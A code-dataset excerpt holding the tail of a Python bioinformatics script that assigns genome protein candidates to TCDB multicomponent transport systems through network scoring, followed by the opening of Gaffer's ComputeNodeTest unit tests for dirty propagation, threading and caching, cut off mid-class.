x = all_dist[cands[0]]
sorted_x = sorted(x.items(), key=operator.itemgetter(1))
order = dict(sorted_x)
prevo = ''
prevd = 0
for o in order:
if order[o]>0:
if order[o] - prevd <= 15:
jnodes[o]["color"] = '#f6f31a'
jnodes[prevo]["color"] = '#f6f31a'
jnodes[o]["group"] = jnodes[prevo]["group"]
jnodes[o]["fy"] = jnodes[prevo]["fy"]
else:
group += 3
jnodes[o]["group"] = group
jnodes[o]["fy"] = random.uniform(-1,1) * group * 5
else:
jnodes[o]["group"] = group+3
prevo = o
prevd = order[o]
#print(edges)
if raw_network == False:
blue_edges = [(u,v) for u,v,e in G.edges(data=True) if e['attr_dic']['tp'] == 'q_vs_s']
white_edges = [(u,v) for u,v,e in G.edges(data=True) if e['attr_dic']['tp'] == 'hit']
red_edges = [(u,v) for u,v,e in G.edges(data=True) if e['attr_dic']['tp'] == 'nohit']
jedges = {(u,v):{"source":u,"target":v,"tp":edges[u,v]['attr_dic']['tp'],"value":5,"color":"#05c1f8","from":'',"to":''} for (u,v) in edges}
else:
blue_edges = [(u,v) for u,v,e in G.edges(data=True) if e['tp'] == 'q_vs_s']
white_edges = [(u,v) for u,v,e in G.edges(data=True) if e['tp'] == 'hit']
red_edges = [(u,v) for u,v,e in G.edges(data=True) if e['tp'] == 'nohit']
jedges = {(u,v):{"source":u,"target":v,"tp":edges[u,v]['tp'],"value":5,"color":"#05c1f8","from":'',"to":''} for (u,v) in edges}
for b in blue_edges:
jnodes[b[0]]["note"] += "<br /> {}".format(b[1])
if raw_network == False:
evalue = edges[(b[0],b[1])]['attr_dic']['evalue']
else:
evalue = edges[(b[0],b[1])]['evalue']
if evalue == 0:
n_e = 1000
else:
n_e = -1*math.log(evalue)
if n_e >= 50:
wt = 4
elif n_e >= 25:
wt = 3
elif n_e >= 15:
wt = 2
else:
wt = 1
jedges[(b[0],b[1])]["value"] = wt
jedges[(b[0],b[1])]["from"] = b[0]
jedges[(b[0],b[1])]["to"] = b[1]
if raw_network == False:
if edges[(b[0],b[1])]['attr_dic']['fusion'] == True:
jedges[(b[0],b[1])]["color"]="#ef34f8"
else:
if edges[(b[0],b[1])]['fusion'] == True:
jedges[(b[0],b[1])]["color"]="#ef34f8"
for w in white_edges:
jedges[(w[0],w[1])]["color"]="#f8f2f1"
if len(red_edges) > 0: # to visualize in-complete systems
for r in red_edges:
jedges[(r[0],r[1])]["color"] = "#f63f1b"
jnodes[r[0]]["note"] += "<br /> Missing: {}".format(r[1])
jname = name.split('.')[0]
network_to_json(jnodes,jedges, jname)
infile = open(sys.path[0]+'/network_GUI_template.html.bkp','r')
outfile = open(name,'w')
lines = infile.readlines()
lines[19] = " const address = '{}'\n".format('file://'+address)
lines[76] = " .jsonUrl('{}')\n".format(jname+'.json')
for line in lines:
outfile.write(line)
# In[13]:
def network_to_json(jnodes,jedges, subnet_name):
json = open(subnet_name+'.json','w')
json.write('{\n "nodes": [\n ')
i = 0
ln = len(list(jnodes.keys()))
for n in jnodes:
json.write(' {')
json.write('"{}":"{}","{}":"{}","{}":"{}","{}":"{}","{}":{},"{}":"{}"'.format("id",n,"tp",jnodes[n]["tp"],"color",jnodes[n]["color"],"note",jnodes[n]["note"],"fy",jnodes[n]["fy"],"group",jnodes[n]["group"]))
json.write('}')
if i < ln - 1:
json.write(',')
json.write('\n')
i += 1
json.write(' ],\n "links": [\n ')
i = 0
ln = len(list(jedges.keys()))
for e in jedges:
json.write(' {')
json.write('"{}":"{}","{}":"{}","{}":"{}","{}":{},"{}":"{}","{}":"{}","{}":"{}"'.format("source",jedges[e]["source"],"target",jedges[e]["target"],"tp",jedges[e]["tp"],"value",jedges[e]["value"],"color",jedges[e]["color"],"from",jedges[e]["from"],"to",jedges[e]["to"]))
json.write('}')
if i < ln - 1:
json.write(',')
json.write('\n')
i += 1
json.write(' ]\n}')
json.close()
# In[14]:
def global_selection(G,T_com,gene_dic,pfam_dic,df,address,green_name,yellow_name,condition='linear',max_cycle=3): # df is raw table data
systems = [x for x,y in T_com.nodes(data=True) if y['attr_dic']['tp'] == 'system']
nodes = dict(G.nodes(data=True))
block = []
total = 0
green_cases = [] #list of tuples (subject, query)
yellow_cases = [] #list of tuples
HPI = [] # high-possible-incomplete systems, list of tuples (cand,comp) indicating HPI
for s in systems:
if s not in block:
count = 0
temp = selection(G,T_com,s,gene_dic,pfam_dic,block,count,green_cases,yellow_cases,HPI,address,condition,max_cycle)
total = total + temp
print('The total number of potentially complete systems is: '+str(count_complete_systems(T_com,nodes)))
print('The total number of complete systems is (rescued included): '+str(total))
green_index = []
yellow_index = []
for index,row in df.iterrows():
if (row['subject_accession'],row['query_accession']) in green_cases:
green_index.append(index)
if (row['subject_accession'],row['query_accession']) in yellow_cases:
yellow_index.append(index)
df_green = df.loc[green_index]
df_green.to_csv(green_name, sep='\t')
if len(yellow_index) > 0:
df_yellow = df.loc[yellow_index]
df_yellow.to_csv(yellow_name, sep='\t')
return green_cases, yellow_cases, HPI
# define the selection function. It will assgin the detailed candidates to a potential complete system
def selection(G,T_com,tcid,gene_dic,pfam_dic,visited_sys,count,green_cases,yellow_cases,HPI,address,condition,max_cycle,cycle=1): # T is a recommended network that only contain all potential complete systems. G is the raw_network, to ensure data extraction easily
# first, check all candidates in the input system. if a candidate linked to other different systems, bring them in. until all connected systems are analyzed together
nodes = dict(G.nodes(data=True))
edges = dict(((u,v),e) for u,v,e in G.edges(data=True))
HPIA = [] # HPI_alternative
#T_edges = dict(((u,v),e) for u,v,e in T_com.edges(data=True)) # Important, dont change
#print(edges)
# construct a sub network to include all linked systems and analyze them together
#S = nx.DiGraph()
rescue = nx.DiGraph()
if cycle == 1:
S = nx.DiGraph()
linked_sys = [tcid]
for ls in linked_sys:
if ls in T_com:
for cpt in list(T_com.predecessors(ls)):
for cand in list(T_com.predecessors(cpt)):
for cp in list(T_com.successors(cand)):
p_sys = list(T_com.successors(cp))[0]
if p_sys not in linked_sys:
linked_sys.append(p_sys)
for ls in linked_sys:
visited_sys.append(ls)
add_system(nodes,edges,T_com,ls,S)
add_system(nodes,edges,T_com,ls,rescue)
else:
S = T_com
T_com_sys = [x for x,y in T_com.nodes(data=True) if y['attr_dic']['tp'] == 'system']
for tcs in T_com_sys:
#add_system(nodes,edges,T_com,tcs,S)
add_system(nodes,edges,T_com,tcs,rescue)
print('The total number of potentially complete systems in cycle {} is: '.format(cycle)+str(count_complete_systems(S,nodes)))
#print(S.nodes(data=True))
cands = [x for x,y in S.nodes(data=True) if y['attr_dic']['tp'] == 'subject']
# for the complete subnetwork S, perform pedigree function. pedigree will generate a dic showing the intersection of membrane protein candidates
# inside the network. if several system share a membrane candidate, or several membrane candidates, they will be analyzed together by paternity_test
if cycle == 1:
pedigree(S, linked_sys,gene_dic,pfam_dic,address,condition)
else:
pedigree(S, T_com_sys,gene_dic,pfam_dic,address,condition)
systems = [x for x,y in S.nodes(data=True) if y['attr_dic']['tp'] == 'system']
for s in systems:
situation = check_complete(nodes,S,s)
if situation[0] == True:
print('(cycle {})'.format(cycle) + s + ' is complete: ')
#rescue.remove_node(s)
for cpt in list(S.predecessors(s)):
print('component '+cpt+' has candidates: ')
#rescue.remove_node(cpt)
for cand in list(S.predecessors(cpt)):
if S[cand][cpt]['attr_dic']['fusion'] == True:
print(cand + ' ( fusion '+S[cand][cpt]['attr_dic']['fusion_verification']+')')
else:
print(cand)
if cand in rescue:
rescue.remove_node(cand)
# add this to the table outputs
if cycle == 1:
green_cases.append((cand,cpt))
else:
yellow_cases.append((cand,cpt))
print('\n')
else:
if (cycle == max_cycle or count_complete_systems(rescue,nodes) == 0) and len(situation[1])/len(nodes[s]['components']) <= 0.5:
print('(cycle {})'.format(cycle) + s + ' is incomplete, but has a high chance to be completed: ')
else:
print('(cycle {})'.format(cycle) + s + ' is incomplete: ')
for cpt in list(S.predecessors(s)):
print('component '+cpt+' has candidates: ')
for cand in list(S.predecessors(cpt)):
print(cand)
if len(situation[1])/len(nodes[s]['components']) <= 0.5:
HPIA.append((cand,cpt))
for ocpt in list(S.successors(s)):
print('component '+ocpt+' has no candidates!')
print('\n')
r_systems = [x for x,y in rescue.nodes(data=True) if y['attr_dic']['tp'] == 'system']
for rs in r_systems:
situation = check_complete(nodes,rescue,rs)
if situation[0] == False:
rescue.remove_node(rs)
for rcpt in nodes[rs]['components']:
if rcpt in rescue: # temporary solution for duplicated component accession in TCDB
for rcand in list(rescue.predecessors(rcpt)):
rescue.remove_edge(rcand,rcpt)
rescue.remove_node(rcpt)
print('The total number of complete systems in cycle {} is: '.format(cycle)+str(count_complete_systems(S,nodes)))
print('\n')
count = count + count_complete_systems(S,nodes)
if cycle == max_cycle:
print('Maximum cycle reached, no convergence observed, human intervention required for above cases!!!!!')
print('\n')
for pair in HPIA:
HPI.append(pair)
return count
print('\n')
if count_complete_systems(rescue,nodes) == 0:
for pair in HPIA:
HPI.append(pair)
return count
else:
return selection(G,rescue,tcid,gene_dic,pfam_dic,visited_sys,count,green_cases,yellow_cases,HPI,address,condition,max_cycle=max_cycle,cycle=cycle+1)
#return S,count_complete_systems(S),count_complete_systems(R),systems
def pedigree(S, linked_sys,gene_dic,pfam_dic,address,condition):
#print(linked_sys)
# generate a dic showing intersection of shared candidates
nodes = dict(S.nodes(data=True))
edges = dict(((u,v),e) for u,v,e in S.edges(data=True))
paternity = {}
candidates = [x for x,y in S.nodes(data=True) if y['attr_dic']['tp'] == 'subject']
for cand in candidates:
cpts_involved = list(S.successors(cand))
cpts_involved.sort() # to eliminate the effect of insertion order
if len(cpts_involved) == 1:
continue # this is the case that candidate is not shared
# if shared
sys_involved = []
for cpt_involved in cpts_involved:
sys_involved.append(list(S.successors(cpt_involved))[0]) # doesnt matter if system in this list duplicates. It means a candidate hits diffrent components in the same system
sys_involved = list(set(sys_involved)) # remove duplicates
# sort and make as a tuple to be the key of paternity dic
sys_involved.sort()
key = tuple(sys_involved)
if key not in paternity:
paternity[key] = {}
paternity[key][tuple(cpts_involved)] = [cand]
else:
# check if cpts involved are same or not
if not tuple(cpts_involved) in paternity[key]: # a new set of cpts that from different sys sharing a cand
paternity[key][tuple(cpts_involved)] = [cand]
else: # a same set of cpts from same set of sys share another new cand
paternity[key][tuple(cpts_involved)].append(cand)
#print(paternity)
# prepare for paternity_test
# when performing paternity_test and looping the dictionary: dic_key will be sorted by length of keys, which means linked TCID keys will be examed first
test_groups = [x for x in list(paternity.keys()) if len(x) > 1]
test_groups_complexity = {}
for tg in test_groups:
if tg not in test_groups_complexity:
test_groups_complexity[tg] = 0
temp = 0
for pairs in paternity[tg]:
local = len(paternity[tg][pairs])
if local > temp:
temp = local
test_groups_complexity[tg] = temp
sorted_tgc = sorted(test_groups_complexity.items(), key=operator.itemgetter(1),reverse=True) # this is the order to keep edges
tgc = dict(sorted_tgc)
test_sequence = list(tgc.keys())
#test_sequence = sorted(test_groups,key=len,reverse=True)
#print(test_sequence)
for t in test_sequence: # convert back from tuple to list later
for rc in paternity[t]: # rc for related cpts
paternity_test(S,nodes,edges,list(rc), paternity[t][rc],gene_dic,pfam_dic,address,condition) # a dictionary contain all assignments
#print (complete_sys)
cpts = [x for x,y in S.nodes(data=True) if y['attr_dic']['tp'] == 'component']
for cpt in cpts:
if len(list(S.predecessors(cpt))) == 0: #incomplete sys
tcid = list(S.successors(cpt))[0]
S.remove_edge(cpt,tcid)
S.add_edge(tcid,cpt,attr_dic={'tp':'nohit','title':'Nohit','weight':1})
def paternity_test(S,nodes,edges,children, parents,gene_dic,pfam_dic,address,condition): #children: cpts_involved, parents: candidates_involved
combination = {}
for p in parents:
for c in children:
combination[(p,c)] = test_kit( S,nodes, edges, p, c,gene_dic,pfam_dic,address,condition )
sorted_combo = sorted(combination.items(), key=operator.itemgetter(1),reverse=True) # this is the order to keep edges
combo = dict(sorted_combo)
assigned_cand = []
assigned_cpts = []
assigned_sys = []
for pc_pair in combo: # dimer situation considered
if pc_pair[0] not in assigned_cand:
#if pc_pair[1] not in assigned_cpts or :
assigned_cand.append(pc_pair[0])
assigned_cpts.append(pc_pair[1])
assigned_sys=assigned_sys+list(S.successors(pc_pair[1]))
'''
else:
if S.has_edge(pc_pair[0],pc_pair[1]):
S.remove_edge(pc_pair[0],pc_pair[1])# remove extra candidate and free them for more potential cases
'''
elif pc_pair[1] not in assigned_cpts and list(S.successors(pc_pair[1]))[0] in assigned_sys:
# check dimer cases
#if pc_pair[1] not in assigned_cpts and list(S.successors(pc_pair[1]))[0] in assigned_sys:
assigned_cpts.append(pc_pair[1])
elif S.has_edge(pc_pair[0],pc_pair[1]):
S.remove_edge(pc_pair[0],pc_pair[1])
if len(list(set(assigned_cpts))) == len(children):
assigned_cpts = []
assigned_sys = []
def test_kit(S,nodes,edges,p,c,gene_dic,pfam_dic,address,condition):
# calculate progressive score to this pair of p-c
score = progressive_score( S, nodes, edges, p, c,gene_dic,pfam_dic,address,condition)
return score + S[p][c]['attr_dic']['fusion_bonus']
# In[15]:
def progressive_score( S, nodes, edges, p, c ,gene_dic,pfam_dic,address,condition):
sys = list(S.successors(c))[0]
other_cpts = nodes[sys]['attr_dic']['components']
other_cpts = [x for x in other_cpts if not x == c]
distance_list = [p]
for cpt in other_cpts:
for oc in list(S.predecessors(cpt)):
if len(list(S.successors(cpt)))>0: # do not include system nodes
distance_list.append(oc)
if len(list(set(distance_list))) == 1:
# special case: during previous process , the system became incomplete
return 0
gene_distance = get_genetic_distance(gene_dic, distance_list,condition)
x = gene_distance[p]
sorted_x = sorted(x.items(), key=operator.itemgetter(1))
p_vs_all = dict(sorted_x)
bonus_score = calculate_bonus_score(S, nodes, edges, p, c,p_vs_all)
basic_score = calculate_individual_basic_score(S, nodes, edges, p, c,pfam_dic,address)
return basic_score + bonus_score
# In[16]:
def calculate_individual_basic_score(S, nodes, edges, p, c,pfam_dic,address): # this is only based on single_edge_confidence
evalue = edges[(p,c)]['attr_dic']['evalue']
if evalue == 0:
normalized_e = 100
else:
normalized_e = -1 * math.log(evalue,10)
if normalized_e > 100:
normalized_e = 100
else:
normalized_e = 100 * (normalized_e/100)
score = normalized_e + max(edges[(p,c)]['attr_dic']['qcov'],edges[(p,c)]['attr_dic']['scov'])
situations = alignment_has_domain(c,p,pfam_dic,address)
if situations[0] == True and situations[1] == True:
score = score + 100
return score
# In[17]:
def calculate_bonus_score(S, nodes, edges, p, c, p_vs_all,initial_bonus=50,reward=30):
# favor genetic contents. For each consective gene or neighbor gene, a fixed bonus will be added
# distance matrix should not include other candiates under the same component which is being investigated
bonus = 0
# check consecutivity of the rest of gene
if p_vs_all[list(p_vs_all.keys())[1]] > 15 or len(list(p_vs_all.keys())) == 0:
return bonus
else:
prev = 0
i = 0
for pva in p_vs_all:
if p_vs_all[pva] == 0:
continue
if p_vs_all[pva] < 15:
bonus += initial_bonus
if p_vs_all[pva] - prev <= 1:
i += 1
bonus += i * reward
prev = p_vs_all[pva]
else:
break
else:
break
return bonus
# In[20]:
def save_network(G, node_filename, edge_filename):
saved_nodes = {}
saved_edges = nx.to_dict_of_dicts(G)
for s_n in G.nodes(data=True):
saved_nodes[s_n[0]] = s_n[1]
json.dump(saved_edges, open(edge_filename,'w'))
json.dump(saved_nodes, open(node_filename,'w'))
# In[21]:
def load_network(node_filename,edge_filename):
load_nodes = json.load(open(node_filename))
load_edges = json.load(open(edge_filename))
recover_network = nx.from_dict_of_dicts(load_edges, create_using=nx.DiGraph)
for ln in load_nodes:
if 'attr_dic' in load_nodes[ln]:
recover_network.add_node(ln,attr_dic=load_nodes[ln]['attr_dic'])
else:
recover_network.add_node(ln,attr_dic=load_nodes[ln])
return recover_network
# df = get_rawdata('/System/Volumes/Data/ResearchData/Users/amedrano/RalfRabus/MultiomponentSystems/Desulfobacula_toluolica_Tol2/reportMulticomponentSystems.tsv')
# pdic = get_info(df['query_accession'], df['subject_accession'],'/System/Volumes/Data/ResearchData/Users/amedrano/RalfRabus/MultiomponentSystems/Desulfobacula_toluolica_Tol2')
# gene_dic = get_gene_feature('/System/Volumes/Data/ResearchData/Users/amedrano/RalfRabus/Genomes/GCA_000307105.1_ASM30710v1/GCA_000307105.1_ASM30710v1_feature_table.txt.gz')
# G = initialize_raw_network(df,pdic,'./tcdb.faa','/ResearchData/Users/amedrano/RalfRabus/MultiomponentSystems/Desulfobacula_toluolica_Tol2')
# T = raw_recom(G,gene_dic)
# network_visualization_v2(T,'/System/Volumes/Data/ResearchData/Users/amedrano/RalfRabus/Genomes/GCA_000307105.1_ASM30710v1/GCA_000307105.1_ASM30710v1_feature_table.txt.gz', 'linear','json_test.html',False)
# G1 = load_network('dorothy_RawNodes.txt', 'dorothy_RawEdges.txt')
# T1 = load_network('dorothy_RecNodes.txt', 'dorothy_RecEdges.txt')
# show_subnetwork(T1,G1, ['1.A.30.1.2'],'/System/Volumes/Data/ResearchData/Users/amedrano/RalfRabus/Genomes/GCA_000307105.1_ASM30710v1/GCA_000307105.1_ASM30710v1_feature_table.txt.gz','/System/Volumes/Data/ResearchData/Users/amedrano/RalfRabus/MultiomponentSystems/Desulfobacula_toluolica_Tol2/','linear','test_isolated_system.html',False)
# get_genetic_distance(gene_dic,['T'])
# save_network(G, 'dorothy_RawNodes.txt', 'dorothy_RawEdges.txt')
# save_network(T, 'dorothy_RecNodes.txt', 'dorothy_RecEdges.txt')
# green_cases,yellow_cases,HPI = global_selection(G,T,gene_dic,pdic,df,'/ResearchData/Users/amedrano/RalfRabus/MultiomponentSystems/Desulfobacula_toluolica_Tol2','dorothy_greens.tsv','dorothy_yellow_greens.tsv')
# In[18]:
def get_df_red(df,green_cases,yellow_cases):
hit_cand = []
hit_cpts = []
for g in green_cases:
if g[0] not in hit_cand:
hit_cand.append(g[0])
if g[1] not in hit_cpts:
hit_cpts.append(g[1])
for y in yellow_cases:
if y[0] not in hit_cand:
hit_cand.append(y[0])
if y[1] not in hit_cpts:
hit_cpts.append(y[1])
drop_list = []
for index,row in df.iterrows():
if row['subject_accession'] in hit_cand or row['query_accession'] in hit_cpts: #or row['subject_accession'] in discarded:
drop_list.append(index)
df_red = df.drop(index = drop_list)
#df_red.drop_duplicates('subject_accession',keep='last',inplace=True)
return df_red
# df_red = get_df_red(df,green_cases,yellow_cases)
# df_red.to_csv('test_dorothy_reds.tsv', sep='\t')
# df_new_red = df.set_index(['subject_accession','query_accession'])
# df_new_red = df_new_red.loc[HPI]
# df_new_red.to_csv('test_dorothy_reds.tsv', sep='\t')
# In[23]:
if __name__ == '__main__':
# parse arguments
parser = argparse.ArgumentParser()
# create a parser to handle options and arguments. Show help info if no args
parser.add_argument( '-d', '--data', type = str, dest = 'data', required=True, metavar = '<raw data table>', help = 'MANDATORY. Path to the output table in tsv format generated by program getMultCompSystems.pl. This table contains all the multicomponent systems matched by the query genome.' )
parser.add_argument( '-tcdb', '--tcdb-proteins', type = str, dest = 'tcdb', required=True, metavar = '<sequence file>', help = 'MANDATORY. Path to the file in fasta format with All the protein content in TCDB as generated by the program extractFamily.pl. This file should reflect the TCDB version that was used to analyze both single and multicomponet systems in the query genome.' )
parser.add_argument( '-ra', '--rootaddress', type = str, dest = 'ra', required=True, metavar = '<directory path>', help = 'MANDATORY. Path to the main output directory generated by program getMultCompSystems.pl. This directory contains the output reports as well as all hydropathy plots for every match between the query genome and multicomponent systems in TCDB.' )
parser.add_argument( '-ft', '--featuretable', type = str, dest = 'ft', required=True, metavar = '<genome featuretable>', help = 'MANDATORY. Path to the feature table file as downloaded from NCBI genome assemblies. This file is used to extract the genomic context of genes and it must be compressed in gzip format.' )
parser.add_argument( '-clan', '--clan_info_file', type = str, dest = 'clan', required=True, metavar = '<pfam clans file>', help = 'MANDATORY. Path to the file with Pfam clans as distributed by Pfam (i.e., Pfam-A.clans.tsv.gz). The information in this file is used to select the best matches reported by program getMultCompSystems.pl. This file should be compressed in gzip format.' )
parser.add_argument( '-c', '--circular', action = 'store_false', dest = 'linear', default = True, help = 'Flag. if set, the replicon structure of the query genome is regarded as circular. This information is used to calculate the distance between pairs of genes. The default setting is: linear.' )
parser.add_argument( '-dot', '--degree_of_tolerance', dest = 'dot', type = int, default = 2, help = 'The degree of tolerance of the network. This indicates ... Default value is 2 (means 2 percent)' )
parser.add_argument( '-rcov','--reciprocal_coverage', dest='pog', type = float, default=0.24, help = 'The minimum alignment coverage for both the query and subject proteins to be considered candidate homologous. Default value is 0.76. ')
args = parser.parse_args()
if len(sys.argv) < 4:
parser.print_help()
sys.exit(1)
df,repeats = get_rawdata(args.data)
pdic = get_info(df['query_accession'], df['subject_accession'], args.ra,args.clan)
gene_dic = get_gene_feature(args.ft)
G = initialize_raw_network(df,repeats,pdic,args.tcdb,args.ra,args.pog)
# save the initial network
save_network(G, 'raw_network_nodes.txt', 'raw_network_edges.txt')
if args.linear == True:
status = 'linear'
else:
status = 'non-linear'
T = raw_recom(G,gene_dic,args.dot,status)
# save the network of stage 2
save_network(T, 'recom_network_nodes.txt', 'recom_network_edges.txt')
green_cases,yellow_cases,HPI = global_selection(G,T,gene_dic,pdic,df,args.ra,'greens.tsv','yellow_greens.tsv',status)
#analyze_inconfident_data(df,green_cases,yellow_cases,discarded,args.tcdb,args.ra, status,args.pog )
df_red = get_df_red(df,green_cases,yellow_cases)
df_red.to_csv('reds.tsv', sep='\t')
df_new_red = df.set_index(['subject_accession','query_accession'])
df_new_red = df_new_red.loc[HPI]
df_new_red.to_csv('refined_reds.tsv', sep='\t')
# In[ ]:
| 48.632843 | 389 | 0.582432 |
404868d98d0d258657091e11cf84188edb0ff69e | 11,559 | py | Python | python/GafferTest/ComputeNodeTest.py | dboogert/gaffer | d2ce0eb7134a33ceee375d0a3676129a9bdcfbc6 | [
"BSD-3-Clause"
] | null | null | null | python/GafferTest/ComputeNodeTest.py | dboogert/gaffer | d2ce0eb7134a33ceee375d0a3676129a9bdcfbc6 | [
"BSD-3-Clause"
] | null | null | null | python/GafferTest/ComputeNodeTest.py | dboogert/gaffer | d2ce0eb7134a33ceee375d0a3676129a9bdcfbc6 | [
"BSD-3-Clause"
] | null | null | null | ##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import threading
import time
import IECore
import Gaffer
import GafferTest
class ComputeNodeTest( GafferTest.TestCase ) :
def testOperation( self ) :
n1 = GafferTest.AddNode()
n1["sum"].getValue()
dirtiedPlugs = GafferTest.CapturingSlot( n1.plugDirtiedSignal() )
setPlugs = GafferTest.CapturingSlot( n1.plugSetSignal() )
n1["op1"].setValue( 2 )
self.assertEqual( len( setPlugs ), 1 )
self.assertEqual( len( dirtiedPlugs ), 2 )
self.assertEqual( setPlugs[0][0].fullName(), "AddNode.op1" )
self.assertEqual( dirtiedPlugs[0][0].fullName(), "AddNode.op1" )
self.assertEqual( dirtiedPlugs[1][0].fullName(), "AddNode.sum" )
n1["op2"].setValue( 3 )
self.assertEqual( len( setPlugs ), 2 )
self.assertEqual( setPlugs[1][0].fullName(), "AddNode.op2" )
del dirtiedPlugs[:]
del setPlugs[:]
# plug set or dirty signals are not emitted during computation
self.assertEqual( n1.getChild("sum").getValue(), 5 )
self.assertEqual( len( setPlugs ), 0 )
self.assertEqual( len( dirtiedPlugs ), 0 )
# connect another add node onto the output of this one
n2 = GafferTest.AddNode( "Add2" )
dirtiedPlugs2 = GafferTest.CapturingSlot( n2.plugDirtiedSignal() )
setPlugs2 = GafferTest.CapturingSlot( n2.plugSetSignal() )
n2["op1"].setInput( n1["sum"] )
# connecting a plug doesn't set the value of the input plug
# immediately - the value is transferred only upon request.
self.assertEqual( len( setPlugs2 ), 0 )
self.assertEqual( len( dirtiedPlugs2 ), 2 )
self.assertEqual( dirtiedPlugs2[0][0].fullName(), "Add2.op1" )
self.assertEqual( dirtiedPlugs2[1][0].fullName(), "Add2.sum" )
del dirtiedPlugs2[:]
del setPlugs2[:]
self.assertEqual( n2["op1"].getValue(), 5 )
self.assertEqual( n2["sum"].getValue(), 5 )
# plug set or dirty signals are not emitted during computation
self.assertEqual( len( setPlugs2 ), 0 )
self.assertEqual( len( dirtiedPlugs2 ), 0 )
def testDirtyOfInputsWithConnections( self ) :
n1 = GafferTest.AddNode( "n1" )
n2 = GafferTest.AddNode( "n2" )
dirtied = GafferTest.CapturingSlot( n1.plugDirtiedSignal(), n2.plugDirtiedSignal() )
n2["op1"].setInput( n1["sum"] )
self.assertEqual( len( dirtied ), 2 )
self.failUnless( dirtied[0][0].isSame( n2["op1"] ) )
self.failUnless( dirtied[1][0].isSame( n2["sum"] ) )
del dirtied[:]
n1["op1"].setValue( 10 )
self.assertEqual( len( dirtied ), 4 )
self.failUnless( dirtied[0][0].isSame( n1["op1"] ) )
self.failUnless( dirtied[1][0].isSame( n1["sum"] ) )
self.failUnless( dirtied[2][0].isSame( n2["op1"] ) )
self.failUnless( dirtied[3][0].isSame( n2["sum"] ) )
self.assertEqual( n2.getChild( "sum" ).getValue(), 10 )
def testDirtyPlugComputesSameValueAsBefore( self ) :
n1 = GafferTest.AddNode( "N1" )
n2 = GafferTest.AddNode( "N2" )
n2.getChild( "op1" ).setInput( n1.getChild( "sum" ) )
n1.getChild( "op1" ).setValue( 1 )
n1.getChild( "op2" ).setValue( -1 )
self.assertEqual( n2.getChild( "sum" ).getValue(), 0 )
def testOutputsDirtyForNewNodes( self ) :
n = GafferTest.AddNode()
n["op1"].setValue( 1 )
n["op2"].setValue( 2 )
self.assertEqual( n["sum"].getValue(), 3 )
def testComputeInContext( self ) :
n = GafferTest.FrameNode()
self.assertEqual( n["output"].getValue(), 1 )
c = Gaffer.Context()
c.setFrame( 10 )
with c :
self.assertEqual( n["output"].getValue(), 10 )
def testComputeInThreads( self ) :
n = GafferTest.FrameNode()
def f( frame ) :
c = Gaffer.Context()
c.setFrame( frame )
with c :
time.sleep( 0.01 )
self.assertEqual( n["output"].getValue(), frame )
threads = []
for i in range( 0, 1000 ) :
t = threading.Thread( target = f, args = ( i, ) )
t.start()
threads.append( t )
for t in threads :
t.join()
def testDirtyNotPropagatedDuringCompute( self ) :
n1 = GafferTest.AddNode( "n1" )
n2 = GafferTest.AddNode( "n2" )
n1["op1"].setValue( 2 )
n1["op2"].setValue( 3 )
n2["op1"].setInput( n1["sum"] )
dirtyCapturer = GafferTest.CapturingSlot( n2.plugDirtiedSignal() )
self.assertEqual( n2["sum"].getValue(), 5 )
self.assertEqual( len( dirtyCapturer ), 0 )
def testWrongPlugSet( self ) :
n = GafferTest.BadNode()
self.assertRaises( RuntimeError, n["out1"].getValue )
def testPlugNotSet( self ) :
n = GafferTest.BadNode()
self.assertRaises( RuntimeError, n["out3"].getValue )
def testHash( self ) :
n = GafferTest.MultiplyNode()
self.assertHashesValid( n )
def testHashForPythonDerivedClasses( self ) :
n = GafferTest.AddNode()
self.assertHashesValid( n )
def testDisableCaching( self ) :
n = GafferTest.CachingTestNode()
n["in"].setValue( "d" )
v1 = n["out"].getValue( _copy=False )
v2 = n["out"].getValue( _copy=False )
self.assertEqual( v1, v2 )
self.assertEqual( v1, IECore.StringData( "d" ) )
# the objects should be one and the same, as the second computation
# should have shortcut and returned a cached result.
self.failUnless( v1.isSame( v2 ) )
n["out"].setFlags( Gaffer.Plug.Flags.Cacheable, False )
v3 = n["out"].getValue( _copy=False )
self.assertEqual( v3, IECore.StringData( "d" ) )
self.assertEqual( v3, v1 )
# we disabled caching, so the two values should
# be distinct objects, even though they are equal.
self.failIf( v3.isSame( v1 ) )
def testConnectedPlugsShareHashesAndCacheEntries( self ) :
class Out( Gaffer.ComputeNode ) :
def __init__( self, name="Out" ) :
Gaffer.ComputeNode.__init__( self, name )
self.addChild( Gaffer.ObjectPlug( "oOut", Gaffer.Plug.Direction.Out, IECore.NullObject() ) )
self.addChild( Gaffer.FloatPlug( "fOut", Gaffer.Plug.Direction.Out ) )
def affects( self, input ) :
return []
def hash( self, output, context, h ) :
h.append( context.getFrame() )
def compute( self, plug, context ) :
if plug.getName() == "oOut" :
plug.setValue( IECore.IntData( int( context.getFrame() ) ) )
else :
plug.setValue( context.getFrame() )
IECore.registerRunTimeTyped( Out )
class In( Gaffer.ComputeNode ) :
def __init__( self, name="In" ) :
